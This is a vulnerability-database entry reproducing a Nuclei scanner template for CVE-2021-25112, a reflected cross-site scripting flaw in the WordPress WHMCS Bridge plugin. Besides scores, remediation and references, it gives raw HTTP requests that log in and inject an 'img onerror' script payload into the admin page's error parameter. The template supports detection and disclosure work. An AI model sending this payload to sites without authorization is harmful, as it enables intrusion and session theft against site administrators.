Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-25112

HistoryMar 27, 2022 - 2:25 p.m.

WordPress WHMCS Bridge <6.4b - Cross-Site Scripting

2022-03-2714:25:03

ProjectDiscovery

github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.6%

JSON

WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.

id: CVE-2021-25112

info:
  name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: |
    WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
    - https://plugins.trac.wordpress.org/changeset/2659751
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25112
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25112
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.40139
    cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: i-plugins
    product: whmcs_bridge
    framework: wordpress
  tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<strong><img src onerror=alert(document.domain)></strong>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a2b074c829e8dc42c189432313efffb7f9da5318f55e319d2755d73408c87795022100dde60a50bcc04205df2039566063b015b72bcc70051c9a54a9c087c20daa5599:922c64590222798bb761d5b6d8e72950

References

github.com/ARPSyndicate/kenzer-templates

nvd.nist.gov/vuln/detail/CVE-2021-25112

plugins.trac.wordpress.org/changeset/2659751

wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.6%

JSON

Related for NUCLEI:CVE-2021-25112